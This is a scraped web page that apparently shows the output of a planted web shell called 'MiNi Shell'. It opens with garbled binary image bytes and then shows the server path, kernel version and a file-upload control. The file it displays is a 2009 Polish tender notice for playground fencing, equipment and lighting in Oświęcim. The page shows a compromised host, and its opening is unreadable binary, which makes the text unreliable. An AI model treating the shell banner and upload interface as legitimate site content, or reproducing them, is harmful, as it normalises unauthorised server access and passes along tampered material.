JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/68927-N-2009.html

<p class="kh_header"><b>Oświęcim: III. Opis przedmiotu zamówienia
1. Przedmiotem zamówienia jest
1.	Wymiana ogrodzenia  placu zabaw przy ul. Pileckiego w Oświęcimiu.
2.	Dostawa i montaż wyposażenia placu zabaw przy ul. Pileckiego w Oświęcimiu wraz z przedstawieniem wizualizacji i planu rozmieszczenia urządzeń na istniejącym placu.
3.	Uzupełnienie i wykonanie dodatkowego oświetlenia na placu zabaw przy   ul. Pileckiego w Oświęcimiu.</b><br>
<b>Numer ogłoszenia: 68927 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Mieszkalnych , ul. gen. Józefa Bema 12, 32-602 Oświęcim, woj. małopolskie, tel. 033 8425615, faks 033 8424051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> III. Opis przedmiotu zamówienia
1. Przedmiotem zamówienia jest
1.	Wymiana ogrodzenia  placu zabaw przy ul. Pileckiego w Oświęcimiu.
2.	Dostawa i montaż wyposażenia placu zabaw przy ul. Pileckiego w Oświęcimiu wraz z przedstawieniem wizualizacji i planu rozmieszczenia urządzeń na istniejącym placu.
3.	Uzupełnienie i wykonanie dodatkowego oświetlenia na placu zabaw przy   ul. Pileckiego w Oświęcimiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Zakres przedmiotu zamówienia, o którym mowa w pkt.1 obejmuje w szczególności

1.	Wymiana istniejącego ogrodzenia od strony południowej z siatki na słupkach stalowych obetonowanych na ogrodzenie z systemowych paneli dostosowanych do ogrodzenia placu zabaw bez wystających elementów          ocynkowanych malowanych proszkowo w kolorze zielonym o wysokości 1,50 m, na słupkach  o wysokości 2,40 m obetonowanych wraz z cokołem z deski żelbetowej prefabrykowanej oraz wykonanie bramy systemowej panelowej o szerokości 4,00 m  oraz furtki o szerokości 1,10 m, wykonanie nawierzchni z kostki betonowej o grubości 6 cm w obrębie stołu do gry w ping-ponga o powierzchni 24,50 m2 oraz wykonanie łagodnego zejścia na plac zabaw o powierzchni 3,30 m2. Nadmiar ziemi powstały  w trakcie robót ziemnych przewiduje się rozplantować na terenie zielonym.
Prace należy wykonać zgodnie z załączonym przedmiarem robot - załącznik nr 7
2.	Dostawa i montaż urządzeń zabawowych ekologicznych na placu zabaw w terenie zielonym z częściowo istniejącym drzewostanem o wymiarach 45,20 x 31,00 m demontaż istniejących urządzeń wykona grupa konserwatorów ZBM.
Wykaz urządzeń przewidzianych do montażu na placu zabaw:
a   piaskownica kwadratowa o wymiarze boku 1,60 m - 2 szt, dla dzieci w wieku  3-7 lat
z belek kwadratowych, zabezpieczona penetrującymi środkami impregnacyjnymi
przykład realizacji nr katalogowy OT-0034 Firmy Croquet lub o zbliżonych parametrach
 
b   karuzela okrągła - dla dzieci w wieku 3-15 lat
średnica od 1,40 m do 1,50 m, podest wykonany z blachy aluminiowej ryflowanej , talerz do odpychania ze stali nierdzewnej, rury ze stali nierdzewnej, siedziska ze sklejki wodoodpornej malowanej farbą akrylową
przykład realizacji nr katalogowy KM-0003 Firmy Croquet lub o zbliżonych parametrach
 
c  huśtawka ważka z siedziskiem, długość 3,00 m, dla dzieci w wieku 3-7 lat
wykonana z belek kwadratowych z drewna klejonego lub bezrdzeniowego, siedziska wykonane z plastiku
przykład realizacji nr katalogowy BK-1700 Firmy Croquet lub o zbliżonych parametrach
 
d  zestaw zabawowy ze zjeżdżalnią, dla dzieci w wieku 3-7 lat 
składający się 3 pomostów, 2 ścianek wspinaczkowych i zjeżdżalni plastikowej, rurowego przejścia miedzy pomostami, wieży z daszkiem. Części drewniane wykonane z belek kwadratowych klejonych lub bezrdzeniowych, zabezpieczone penetrującymi środkami impregnacyjnymi, wymiary zestawu: 4,10 x 3,40 m, wysokość zestawu 1,75 m
przykład realizacji nr katalogowy BK-0204 Firmy Croquet lub o zbliżonych parametrach
 
e tor przeszkód 
przykład realizacji nr katalogowy BK-0026 i BK-0042 Firmy Croquet lub o  zbliżonych parametrach
  
g  betonowy stół do ping-ponga osadzony w podłożu  gruntowym o wymiarach długość 2,74 m, szerokość 1,52 m

h  huśtawka podwójna, dla dzieci w wieku 3-7 lat
z belek kwadratowych, zabezpieczonych penetrującymi środkami impregnacyjnymi, szerokość 3,45 m, długość 1,87 m, siedziska plastikowe, łańcuchy ocynkowane
przykład realizacji nr katalogowy BK-1805 Firmy Croquet lub o zbliżonych parametrach
 
i  zjeżdżalnia ślizg plastikowy dla dzieci w wieku 3-7 lat - 1 szt 
przykład realizacji nr katalogowy BK-0102 Firmy Croquet lub o zbliżonych parametrach
 
k  ścianka gimnastyczna
przykład realizacji nr katalogowy OT-0019 Firmy Croquet lub o zbliżonych parametrach
 
l   huśtawka na sprężynie   Kiwak  dla dzieci w wieku 3-7 lat  - 3 szt 
przykład realizacji nr katalogowe SP-1002, SP-1009, SP-2007 Firmy Croquet lub o  zbliżonych parametrach
   
ł   tablica do rysowania mała
wykonana z belek kwadratowych, zabezpieczonych penetrującymi środkami impregnacyjnymi

m  ławki bez oparcia - 2 szt 
	siedzisko deski sosnowe lub świerkowe, długość 1,70 m, wysokość 0,78 m, szerokość siedziska 0,40 m
	podstawy  odlew żeliwny z wykonanymi otworami w odlewie
	zabezpieczenie: drewno zabezpieczone penetrującymi środkami impregnacyjnymi w kolorze mahoniu podstawy żeliwne pomalowane farbą podkładową i czarną nawierzchniową farbą chlorokauczukową
	montowane na stałe
n   ławki parkowe z oparciem - 4 szt 
	siedzisko deski sosnowe lub świerkowe, długość 1,70 m, wysokość 0,78 m, szerokość siedziska 0,40 m
	podstawy  odlew żeliwny z wykonanymi otworami w odlewie
	zabezpieczenie  drewno zabezpieczone penetrującymi środkami impregnacyjnymi w kolorze mahoniu podstawy żeliwne pomalowane farbą podkładową i czarną nawierzchniową farbą chlorokauczukową
	montowane na stałe
o   kosze betonowe  -  4 szt  
montowane na stałe , średnica około 0,30 m pojemność 70 l, wkład workowy
p   stojak na rowery  na 5 miejsc 2 szt   
wymiary  długość 2,40 m, szerokość 0,40 m, wysokość 0,45 m, metalowy montowany na stałe
przykład realizacji nr katalogowy BK-0032-3 Firmy Croquet lub o  zbliżonych parametrach
 
r tablica z regulaminem placu zabaw
przykład realizacji nr.kat. BK-0039 Firmy Croquet podobna lub o  zbliżonych parametrach. 


Wszystkie zamontowane urządzenia opisane w punktach 2.2 muszą posiadać certyfikat potwierdzenia spełnienia warunków statyczno- wytrzymałościowych oraz bezpieczeństwa i spełniać wymagania normy PN-EN 1176 .
3.	Uzupełnienie oświetlenia placu, poprzez wykonanie dodatkowego słupa oświetleniowego z wysięgnikiem dwuramiennym i dwoma lampami o mocy 70 W.
Prace należy wykonać zgodnie  z załączonym przedmiarem robot - załącznik nr 6.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 31.50.00.00-1, 51.50.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Informacja o warunkach jakie muszą spełniać oferenci
1.	O zamówienie mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie art.24 ust.1 i 2 oraz spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. (Dz.U. z 2007 Nr 223 poz.1655 , z 2008 r. Nr 171 poz.1058  )

Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg formuły spełnia -nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale VIII niniejszej SIWZ .Z treści załączonych dokumentów musi wynikać jednoznacznie , iż w/w warunki wykonawca spełnił . 
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące oświadczenia i dokumenty:

1. Wymagane oświadczenia
I. Każdy wykonawca przystępujący do postępowania powinien złożyć oświadczenie, że:

1.posiada uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym             i   osobami zdolnymi do wykonania zamówienia,
3.znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.nie podlega wykluczeniu z postępowania o udzielenie zamówienia.

2 Lista wymaganych dokumentów
I. Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu potwierdzenia spełnienia warunków , że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art.22 ust.1 i art.24 ust.1 i 2 ustawy  Prawo zamówień publicznych , przedstawienie wymienionych niżej dokumentów :
1.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.aktualne zaświadczenie właściwego naczelnika urzędy skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio , że wykonawca nie zalega z opłacaniem podatków , opłat oraz składek na ubezpieczenie zdrowotne i społeczne , lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed terminem upływu składania ofert.
3.wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji, doświadczenia a także zakresu wykonywanych przez nich czynności - zgodnie z załącznikiem nr 5 do SIWZ:
       O zamówienie mogą ubiegać się wykonawcy, którzy zatrudniają odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej stanowisk, posiadający kwalifikacje i uprawnienia niezbędne do wykonywania zamówienia.
Personel kierowniczy :
1. kierownik robot budowlanych , posiadający uprawnienia do kierowania robotami budowlanymi specjalności konstrukcyjno - budowlanej , wraz z przynależnością do właściwej Izby Samorządu Zawodowego
2. . kierownik robot budowlanych , posiadający uprawnienia do kierowania robotami budowlanymi specjalności instalacyjno - inż. w zakresie sieci elektrycznej , wraz z przynależnością do właściwej Izby Samorządu Zawodowego.
4.wykazu wykonanych robót w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie   (referencje )  zgodnie z załącznikiem nr 6 do SIWZ 
     Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt 2 ust.2 i 3 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) nie zalega z uiszczeniem podatków, opłat , składek na ubezpieczenia społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

    Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w ust. 1 i 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

    Każdy z podmiotów występujących wspólnie zobowiązany jest do złożenia oświadczeń i dokumentów określonych w rozdz. VIII.
    
    Dokumenty te, zgodnie z obowiązującym w tym zakresie rozporządzeniem Prezesa Rady Ministrów z dnia 19.05.2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz.U. z 24 maja 2006r. Nr 87, poz. 606), mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.

II.	Pozostałe dokumenty wymagane od oferentów

1.  oferty zdjęciowe urządzeń wraz z opisem technicznym , z którego wynika ,że przedmiotowe urządzenia spełniają wymogi podane przez Zamawiającego w specyfikacji istotnych warunków zamówienia ; certyfikaty i atesty potwierdzające spełnienie wymogów statyczno wytrzymałościowych oraz spełnianie normy PN-EN 1176  
2.  pełnomocnictwa osób podpisujących ofertę w imieniu firmy składającej ofertę o ile nie wynika to z innych dokumentów załączonych przez wykonawcę . Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez notariusza .
3. w przypadku wspólników spółki cywilnej umowę spółki regulującą współpracę tych   podmiotów .Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, wspólnicy  spółki cywilnej, konsorcja - ponoszą solidarną odpowiedzialność za wykonanie umowy. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako pełnomocnik pozostałych (lider).
4. Wykonawca udziela Zamawiającemu gwarancji na piśmie. Gwarancja zawiera w swej treści dwa podstawowe  elementy.  Pierwszy  z nich,  obejmuje  zapewnienie  sprawnego i prawidłowego funkcjonowania przedmiotu zamówienia. Drugi zaś określa warunki odpowiedzialności gwaranta. Stąd też w treści dokumentu gwarancyjnego  , winny znaleźć się m.in. okres gwarancji obejmujący pełny zakresu przedmiotu zamówienia, terminy usuwania stwierdzonych wad i usterek, wskazanie świadczeń gwaranta na rzecz Zamawiającego oraz warunki odpowiedzialności gwaranta. 

Okres gwarancji wskazany przez oferenta dotyczy pełnego zakresu przedmiotu zamówienia.
Brak w przedłożonym dokumencie szczegółowych warunków gwarancji spowoduje odrzucenie oferty.
Okres rękojmi zgodnie  z Kodeksem Cywilnym.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zbm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Mieszkalnych ul.Bema 12 32-602 Oświęcim.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 09:00, miejsce: Zarząd Budynków Mieszkalnych ul. Bema 12  32-602 Oświęcim.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com